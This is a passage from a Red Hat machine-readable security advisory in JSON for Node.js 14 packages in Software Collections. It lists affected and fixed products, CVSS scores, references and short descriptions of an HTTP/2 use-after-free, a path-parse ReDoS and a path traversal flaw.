"7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22940" }, { "category": "external", "summary": "RHBZ#1993029", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993029" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22940", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22940" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22940", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22940" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "nodejs: Use-after-free on close http2 on stream canceling" }, { "cve": "CVE-2021-23343", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-05-04T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1956818" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-path-parse. All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Had Quay , whilst a vulnerable version of `path-parse` is included in the quay-rhel8 container it is a development dependency only, hence the impact by this vulnerability is low.\n\nIn OpenShift Container Platform (OCP), the hadoop component which is a part of the OCP metering stack, ships the vulnerable version of \u0027path-parse\u0027.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected component is marked as wontfix.\nThis may be fixed in the future.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of `path-parse`, however the vulnerable functionality is currently not used in any part of the product.\n\nIn Red Hat Virtualization cockpit-ovirt, ovirt-engine-ui-extensions and ovirt-web-ui use vulnerable version of `path-parse`, however for cockpit-ovirt it is a development time dependency only, and for ovirt-engine-ui-extensions and ovirt-web-ui the vulnerable functions are never used.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-23343" }, { "category": "external", "summary": "RHBZ#1956818", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1956818" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-23343", "url": "https://www.cve.org/CVERecord?id=CVE-2021-23343" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067", "url": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067" } ], "release_date": "2021-05-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe" }, { "cve": "CVE-2021-32803", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path 